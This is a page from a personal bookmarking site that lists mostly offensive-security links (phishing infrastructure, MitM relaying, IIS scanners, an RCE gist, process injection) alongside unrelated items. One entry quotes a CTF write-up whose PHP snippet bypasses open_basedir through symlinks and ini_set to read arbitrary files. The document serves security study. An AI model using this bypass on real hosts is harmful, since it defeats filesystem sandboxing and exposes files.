781 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
◄Older
page 3 / 40
Newer►
  • puzzlepeaches/sneaky_gophish: Hiding GoPhish from the boys in blue
    February 24, 2025 at 4:23:58 PM UTC * - permalink -
    QRCode
    - https://github.com/puzzlepeaches/sneaky_gophish
    phishing ioc
  • True American (Drinking Game) Rules

    https://docs.google.com/document/d/1Nsf2QSJNj6cKL5_tGrmKQT-ErAPOULlUgHOtNpbOVtU/edit?tab=t.0

    February 21, 2025 at 8:56:44 PM UTC * - permalink -
    QRCode
    - https://www.trueamericanrules.com/
    true americans new girl
  • Source Code Disclosure in ASP.NET apps – PT SWARM
    February 19, 2025 at 1:20:40 PM UTC * - permalink -
    QRCode
    - https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/
    iis asp source code disclo file
  • RedTeamPentesting/pretender: Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS, LLMNR and NetBIOS-NS spoofing.
    February 17, 2025 at 2:12:08 PM UTC * - permalink -
    QRCode
    - https://github.com/RedTeamPentesting/pretender
    interne responder poisonning
  • thumbnail
    sw33tLie/sns: IIS shortname scanner written in Go
    February 13, 2025 at 9:39:18 PM UTC * - permalink -
    QRCode
    - https://github.com/sw33tLie/sns
    short name scanner iis windows web
  • thumbnail
    Examples of TLS/SSL Vulnerabilities TLS Security 6: | Acunetix
    January 23, 2025 at 4:30:50 PM UTC * - permalink -
    QRCode
    - https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/
  • World's First MIDI Shellcode :: portasynthinca3's blog
    January 6, 2025 at 6:20:53 PM UTC * - permalink -
    QRCode
    - https://psi3.ru/blog/swl01u/
    midi shellcode rce
  • 2411.19826v1.pdf
    December 11, 2024 at 4:26:55 PM UTC * - permalink -
    QRCode
    - https://arxiv.org/pdf/2411.19826
    moving sofa problem
  • thumbnail
    Liferay Json Deserialize 1 hit RCE
    November 20, 2024 at 3:20:37 PM UTC * - permalink -
    QRCode
    - https://gist.github.com/testanull/4f8a9305b5b57ab8e7f15bbb0fb93461
    liferay exploit rce
  • DOMLogger++ | GreHack 2024 Workshop
    November 18, 2024 at 12:47:29 PM UTC * - permalink -
    QRCode
    - http://domloggerpp-workshop.mizu.re:5173/
    domlogger dom logger grehack mizu sink workshop
  • Installing Windows — Generic Config
    November 15, 2024 at 5:36:53 PM UTC * - permalink -
    QRCode
    - https://fishilico.github.io/generic-config/windows/install.html
    windows kms enable activation
  • thumbnail
    dockur/windows: Windows inside a Docker container.
    November 10, 2024 at 3:27:11 PM UTC * - permalink -
    QRCode
    - https://github.com/dockur/windows
    docker windows
  • thumbnail
    Azure · nccgroup/ScoutSuite Wiki
    October 7, 2024 at 12:34:32 PM UTC * - permalink -
    QRCode
    - https://github.com/nccgroup/ScoutSuite/wiki/Azure
    azure ad osint recon
  • 52.0.228.201/writeup.txt

    This challenge was about bypassing PHP open_basedir when having a restricted arbitrary PHP code execution. Most of commons functions to execute commands were blocked.

    The initial solution that was intended used the following facts :

    • open_basedir can be tampered at runtime with ini_set, but is restricted by open_basedir itself (in other words, we should only be able to harden the existing rule)
    • open_basedir on symlink is working
    • call ini_set for open_basedir checks are only done at the time of changing the rule; the file system can change then

    That means that we can point open_basedir to a regular file under /tmp/, and then switch it to a symlink pointing to ../../../../[...] - but to create such a symlink, we need to create an arborescence that allows do to so without breaching the rule :

    chdir('/tmp');
    $x='';
    for($i=0;$i<10;$i++){
    mkdir('z');
    chdir('z');
    $x.='../';
    }
    symlink($x,'x');
    symlink($x,'y');
    ini_set('open_basedir','x:y:/tmp/x');
    rename('x',$x.'/x');
    chdir('y');
    chdir('x');
    ini_set('open_basedir','/:/tmp/z');
    echo file_get_contents('/flag.txt');

    Congratz to every solvers!
    Blaklis

    September 26, 2024 at 8:39:29 AM UTC * - permalink -
    QRCode
    - http://52.0.228.201/writeup.txt
    php bypass open_basedir ctf
  • ProcessInjectionTechniques | This comprehensive process injection series is crafted for cybersecurity enthusiasts, researchers, and professionals who aim to stay at the forefront of the field. It serves as a central repository of knowledge, offering in-depth exploration of various process injection techniques used by adversaries.
    September 15, 2024 at 3:09:11 PM UTC * - permalink -
    QRCode
    - https://offensive-panda.github.io/ProcessInjectionTechniques/
    process injection
  • GPU Passthrough to VM - 3os
    September 11, 2024 at 11:27:26 AM UTC * - permalink -
    QRCode
    - https://3os.org/infrastructure/proxmox/gpu-passthrough/gpu-passthrough-to-vm/
    gpu passthrough proxmox
  • Wei's OneDrive
    August 12, 2024 at 3:33:30 PM UTC * - permalink -
    QRCode
    - https://od.cloudsploit.top/tools/
    hacking tools
  • HTWMCL?
    July 16, 2024 at 3:49:48 PM UTC * - permalink -
    QRCode
    - https://www.htwmcl.fr/
    howto command line find tools
  • Fuzzing Windows RPC with RpcView | itm4n's blog
    July 11, 2024 at 10:41:36 AM UTC * - permalink -
    QRCode
    - https://itm4n.github.io/fuzzing-windows-rpc-rpcview/
    rpc research rpcview fuzz
  • thumbnail
    Security Cameras - A Penetration Tester's Journey | Tobia Bocchi: whoami, blogging, notes
    July 9, 2024 at 11:24:14 AM UTC * - permalink -
    QRCode
    - https://tobiabocchi.me/posts/ip-cam-pentester-journey/
    camera ip hardware
Links per page: 20 50 100
◄Older
page 3 / 40
Newer►
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation